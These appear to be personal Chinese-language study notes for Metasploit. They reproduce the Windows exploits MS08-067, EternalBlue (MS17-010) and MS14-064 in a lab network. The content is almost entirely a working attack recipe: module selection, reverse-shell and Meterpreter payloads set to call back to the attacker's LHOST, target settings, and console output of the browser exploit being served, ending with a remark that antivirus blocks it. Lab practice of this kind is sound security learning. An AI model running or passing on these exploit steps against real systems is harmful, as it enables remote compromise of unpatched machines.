Metasploit学习笔记
0x0 ms08_067漏洞复现
- search ms08_067
- use exploit/windows/smb/ms08_067_netapi
- show payloads
- set payload generic/shell_reverse_tcp
- show options
- show targets
- set RHOST 192.168.242.131 (攻击目标ip)
- set LPORT 7777 (shell回连端口)
- set LHOST 192.168.242.129 (shell回连ip)
- set target 34 (设定攻击目标类型)
- exploit (开始攻击)
或者payload设置成:
set payload windows/meterpreter/reverse_tcp
0x01 ms17-010 永恒之蓝漏洞复现
- 先从网上下载最新的eploit到metasploit框架的目录下面
存放目录:
/usr/share/metasploit-framework/modules/exploits/windows/smb/
查看exploit使用要求:
需要安装ruby.smb
gem install ruby_smb
- 开始使用模块 :msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"
- 下面就是一般步骤了
0x02 查找指定系统平台漏洞命令
命令: search platform: windows xp sp3
0x03 windows7 ms14-064漏洞复现
步骤如下:
- service postgresql start
- msfconsole
- search ms14
- use exploit/windows/browser/ms14_064_ole_code_execution
- set payload windows/meterpreter/reverse_tcp
- set AllowPowershellPrompt true
- set LHOST 192.168.242.129
- set SRVHOST 192.168.242.129
- exploit
exploit(ms14_064_ole_code_execution) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.242.129:4444
[*] Using URL: http://192.168.242.129:8080/oGDKNQK3XUO
[*] Server started.
msf exploit(ms14_064_ole_code_execution) > [*] 192.168.242.1 ms14_064_ole_code_execution - Gathering target information.
[*] 192.168.242.1 ms14_064_ole_code_execution - Sending HTML response.
[*] 192.168.242.1 ms14_064_ole_code_execution - Sending exploit...
[*] 192.168.242.1 ms14_064_ole_code_execution - Sending exploit...
Interrupt: use the 'exit' command to quit
msf exploit(ms14_064_ole_code_execution) >
靶机访问 :http://192.168.242.129:8080/oGDKNQK3XUO
即可
复现成功,但是会被360拦截